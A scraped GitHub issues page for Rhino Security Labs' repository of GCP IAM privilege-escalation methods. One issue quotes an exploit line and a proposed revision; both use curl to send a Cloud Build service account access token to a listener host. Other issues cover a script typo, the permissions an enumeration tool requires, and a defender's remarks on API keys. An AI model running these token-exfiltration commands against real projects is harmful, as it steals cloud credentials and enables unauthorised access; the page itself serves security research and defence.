rhinosecuritylabs / gcp-iam-privilege-escalation Goto Github PK
View Code? Open in Web Editor NEWA collection of GCP IAM privilege escalation methods documented by the Rhino Security Labs team.
License: BSD 3-Clause "New" or "Revised" License
A collection of GCP IAM privilege escalation methods documented by the Rhino Security Labs team.
License: BSD 3-Clause "New" or "Revised" License
We can't get Cloud Build Service Account token by this python code.
issue python file
https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/cloudbuild.builds.create.py
Becouse no longer unavailable /root/tokencache/gsutil_token_cache in my environment.
issue code
if args.listening_host:
command = f'import os;os.system("curl -d @/root/tokencache/gsutil_token_cache {args.listening_host}")'
else:
command = f'import os;os.system("curl -d @/root/tokencache/gsutil_token_cache {args.ip_port}")'
So I suggest Changeing build container and command to gcr.io/cloud-builders/gcloud and commands to get access_token.
suggest code
if args.listening_host:
command = f'import os;os.system("gcloud auth print-access-token > token.txt ;curl -d @token.txt {args.listening_host}")'
else:
command = f'import os;os.system("gcloud auth print-access-token > token.txt ;curl -d @token.txt {args.ip_port}")'
I will pull request for this issue.
Hello,
Just to inform you that you made a small typo mistake in one of your exploit script :
res = service.projects().serviceAccounts().generateAccessToken(name=f'projects/-/serviceAccounts/{svc_acccount["email"]}', body=body).execute()
on line 38
Should be
res = service.projects().serviceAccounts().generateAccessToken(name=f'projects/-/serviceAccounts/{svc_account["email"]}', body=body).execute()
Nothing bad
Have a nice day
What are the required permissions to use the enumerate_member_permissions.py script ?
It looks like you need at least:
resourcemanager.projects.get
to use projects.getAncestry
resourcemanager.projects.getIamPolicy
to use projects.getIamPolicy
resourcemanager.folders.getIamPolicy
to use folders().getIamPolicy
resourcemanager.organizations.getIamPolicy
to use organizations.getIamPolicy
How would you suggest going about creating a oauth2 token that many of these scripts ask for?
Thanks.
Thanks for the repo, it's very helpful as a defender putting together policies.
I think there are a couple of issues with the API keys route included in this tool and mentioned in the post.
My understanding is that API keys don't grant you access to any non-public resource, they just allow you to make API requests that are billed to a project and are identified as coming from a particular source application. ref https://cloud.google.com/docs/authentication#applications
Most Google Cloud APIs also support anonymous access to public data using API keys. However, API keys only identify the application, not the principal. When using API keys, the principal must be authenticated by other means.
I think any user that already has some permissions on a project already has more privileges than what is granted by an API key?
Separately the detector has the permission names wrong - serviceusage.apiKeys.{create,list}
don't exist, it's apikeys.keys...
instead.
EDIT: Removed :)
A declarative, efficient, and flexible JavaScript library for building user interfaces.
๐ Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. ๐๐๐
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google โค๏ธ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.